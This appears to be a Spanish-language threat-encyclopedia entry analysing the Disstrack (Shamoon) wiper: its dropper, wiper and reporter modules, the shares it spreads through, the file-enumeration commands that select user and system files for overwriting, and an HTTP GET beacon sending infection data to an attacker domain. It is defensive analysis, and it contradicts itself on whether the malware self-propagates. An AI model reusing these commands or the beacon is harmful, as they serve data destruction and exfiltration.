Disstrack
Gusano para plataformas Windows que se propaga a través de unidades de red compartidas, extrae del propio ejecutable e instala nuevos modulos que sobreescriben ficheros del equipo, dejándolo inservible y modifican el registro de maestro de arranque e manera que el equipo no pueda volver a arrancar
Detalles técnicos
- Peligrosidad: 3 - Media
- [Explicación de los criterios]
- Difusión: Baja
- Daño: Bajo
- Dispersibilidad: Baja
- Fecha de alta: 20/08/2012
- Última actualización: 23/08/2012
- Nombre completo del virus: Trojan.Multi/Disstrack@US+UL+Otros
- Tipo de código: TrojanCaballo de Troya: programa que parece beneficioso o útil pero resulta ser malicioso en algún momento. No se propaga por si mismo.
-
Plataformas afectadas: Multi: Afecta a las plataformas W32Microsoft Windows de 32 bits, pudiendo afectar a Microsoft Windows Vista/XP/Server 2008/Server 2003/2000/NT/Me/98/95 / W64Microsoft Windows de 64 bits, pudiendo afectar a Microsoft Windows Vista/XP/Server 2008/Server 2003
- Capacidad de residencia permanente : No. No tiene capacidad para ejecutarse automáticamente en cada reinicio del sistema.
- Tamaño (bytes): 989.184
- Alias:
- W32.Disttrack (Symantec)
- Trojan.Win32.EraseMBR.a. (Kaspersky)
- W32/DistTrack.A (Norman)
- Shamoon (Otros)
- Trojan.Win64.EraseMBR.a. (Kaspersky)
Propagación
Capacidad de autopropagación: No
Carece de rutina propia de propagación. Puede llegar al sistema de las siguientes maneras:
Unidades del Sistema
Unidades del sistema (locales, mapeadas, extraíbles)Unidades Locales del Sistema
Se propaga a unidades locales del sistema.Otro mecanismo de propagación
- Descargado por otro código malicioso o descargado sin el conocimiento del usuario al visitar una página Web infectada.
- Descargarlo de algún programa de compartición de ficheros (P2P).
Infección/Efectos
Cuando Disstrack se ejecuta, realiza las siguientes acciones:
Ficheros y carpetas
- Crea los siguientes ficheros
- "%System%\trksrv.exe"
- "%System%\drivers\drdisk.sys"
- "%System%\netinit.exe"
- "%System%\[Nombre-Seleccionado-de-una-lista].exe"
Resto de acciones
Método de infección
El gusano llega al equipo comprometido a través de unidades de red compartidas:
- \\[EQUIPO]\ADMIN$
- \\[EQUIPO]\C$\\WINDOWS
- \\[EQUIPO]\D$\\WINDOWS
- \\[EQUIPO]\E$\\WINDOWS
El fichero original es un ejecutable de 32 bits de nombre TRKSVR.EXE de 989184 bytes de tamaño. Cuando se ejecuta se instala como un servicio del sistema. Este servicio extrae del propio fichero ejecutable, e instala, otros componentes/módulos. Estos componentes estan almacenados en ejecutable original como recursos con nombres PKCS12, PKCS7 y X509.
Otros detalles
Cuando el gusano es ejecutado, se copia a sí mismo en las siguientes unidades de red compartidas:
- \\[EQUIPO]\ADMIN$
- \\[EQUIPO]\C$\\WINDOWS
- \\[EQUIPO]\D$\\WINDOWS
- \\[EQUIPO]\E$\\WINDOWS
El gusano consta de varios componentes:
- Un Dropper: Componente principal que descarga otros módulos y es el primero que infecta el sistema.
- El "Wiper": Se trata del módulo que contiene la funcionalidad destructiva.
- El informador (Reporter): Se trata del módulo que envía información de la infección al atacante.
El Dropper tiene las siguientes funcionalidades:
- Se copia a sí mismo en %System%\trksrv.exe
- Descarga los siguientes módulos:
- Un Dropper de 64 bits: Se encuentra en el fichero %System%\trksrv.exe en el recurso cifrado “X509”
- El módulo informador: Se encuentra en el fichero %System%\netinit.exe en el recurso cifrado "PKCS7"
- El módulo "Wiper" (Limpiador): Se encuentra en %System%\[Nombre-Seleccionado-de-una-lista].exe en el recurso cifrado "PKCS12"
Nota: [Nombre-Seleccionado-de-una-lista] puede ser uno de los siguientes:
- caclsrv
- certutl
- clean
- ctrl
- dfrag
- dnslookup
- dvdquery
- event
- extract
- findfile
- fsutl
- gpget
- iissrv
- ipsecure
- msinit
- ntx
- ntdsutl
- ntfrsutil
- ntnw
- power
- rdsadmin
- regsys
- routeman
- rrasrv
- sacses
- sfmsc
- sigver
- smbinit
- wcscript
- Se copia a sí mismo en las siguientes unidades de red compartidas:
- \\[EQUIPO]\ADMIN$
- \\[EQUIPO]\C$\\WINDOWS
- \\[EQUIPO]\D$\\WINDOWS
- \\[EQUIPO]\E$\\WINDOWS
- Crea una tarea programada para ejecutarse a sí mismo
- Crea el siguiente servicio para ejecutarse cada vez que se inicia Windows:
Servicio: TrkSvr
Nombre: Distributed Link Tracking Server
Ruta: %System%\trksvr.exe
El módulo "Wiper" (Limpiador) realiza las siguientes tareas:
- Borra el siguinte fichero de drivers y crea un fichero legítimo con el mismo nombre, pero que el troyano utiliza para leer y escribir directamente sectores en disco sin pasar por el sistema operativo:
- %System%\drivers\drdisk.sys
Este driver es usado para sobreescribir el MBR (Master Boot Record) del ordenador pero no es malicioso en sí mismo.
El fichero esta firmado digitalmente por “EldoS Corporation".
- Ejecuta los siguientes comandos para recabar nombres de ficheros , los cuales serán sobreescritos como f1.inf y f2.inf:
dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf
dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf
dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf
dir C:\Users\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf
dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf
dir C:\Windows\System32\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.infNota: Los ficheros de f1.inf y f2.inf serán sobreescritos con una imagen JPEG que trae incorporada el modulo Wiper y que se puede ver más abajo. Los ficheros sobreescritos quedan inutiles y no puede ser reparados. Tienen que ser sustituidos por los ficheros originales.
Nota: Estos comandos, entre otros sobreescriben:
- Todos los fichero descargados por el usuario y que se encuentren en la carpeta "Descargas"
- Todos los documentos del usuario que se encuentren en la carpeta "Mis Documentos"
- Todas las imágenes del usuario que se encuentre en la carpeta "Mis imágenes"
- Todos los videos del usuario que se encuentren en la carpeta "Vídeos"
- Toda la música del usuario que se encuentre en la carpeta "Música"
- Todos los ficheros que se encuentre en el escritorio
- Todos los drivers del sistema alojados en C:\Windows\System32\Drivers
- Todos los ficheros de configuración del sistema alojados en C:\Windows\System32\Config
- Todos los fichero descargados por el usuario y que se encuentren en la carpeta "Descargas"
- El módulo sobreescribe el MBR y de esta manera el equipo comprometido no vuelve a arrancar.
La siguiente cadena fue encontrada en el código fuente del módulo "Wiper" y da una idea de a quien va dirigido este gusano:
C:\Shamoon\ArabianGulf\wiper\release\wiper.pdb
Por último el módulo informador es responsable de enviar información sobre la infección al atacante.
La Información es enviada usando una petición HTTP GET con la siguiente esctructura:
http://[DOMINIO]/ajax_modal/modal/data.asp?mydata=[DATOS]&uid=[UID]&state=[ESTADO]
La siguiente información es, de esta forma, mandada al atacante:
- [MYDATA] = Indica cuantos ficheros fueron sobre escritos
- [UID] = Dirección IP del equipo comprometido
- [STATE] = Número aleatorio
No hay comentarios.:
Publicar un comentario